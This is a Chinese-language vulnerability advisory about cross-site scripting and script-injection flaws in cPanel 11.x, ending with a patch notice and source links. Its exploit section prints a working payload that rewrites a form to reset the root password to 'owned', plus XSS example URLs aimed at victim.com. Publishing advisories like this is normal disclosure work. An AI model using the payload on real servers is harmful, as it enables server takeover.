添加时间:
2009-02-27

系统编号:
WAVDB-01338
BUGTRAQ: 33840

影响版本:
11.x

程序介绍:

cPanel是基于web的工具，用于自动化控制网站和服务器。

漏洞分析:

cPanel中存在多个输入验证错误，远程攻击者可以执行脚本注入和跨站脚本攻击。
1) cPanel没有正确地过滤对用户主目录中.contactemail文件的输入，如果显示了恶意邮件就会在用户浏览器会话中注入任意HTML和脚本代码。
2) cPanel没有正确地过滤对scripts2/confdkillproc脚本的输入便返回给了用户，远程攻击者可以通过跨站脚本攻击在用户浏览器会话中执行任意HTML和脚本代码。

漏洞利用:

"onmouseover="f=document.forms[0];f.action='/scripts/passwd';f.user.value='root';f.removeChild(f.domain);d=document.createElement('input');f.appendChild(d);d.name='password';d.value='owned';d=document.createElement('input');f.appendChild(d);d.name='password2';d.value='owned';f.submit()

http://victim.com:2086/scripts2/saveuthemes?themetype=modules&${moduleName}=${versionNumber}
http://victim.com:2086/scripts2/confdkillproc?%3Cscript%3Ealert(1337)%3C/script%3E=1&trusted=

解决方案:
厂商补丁：
cPanel
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
http://www.cpanel.net


信息来源:
<*来源：mckt
链接：http://secunia.com/advisories/33990/
http://skeptikal.org/index.php?entry=entry080805-140000
http://skeptikal.org/index.php?entry=entry080809-180834
*>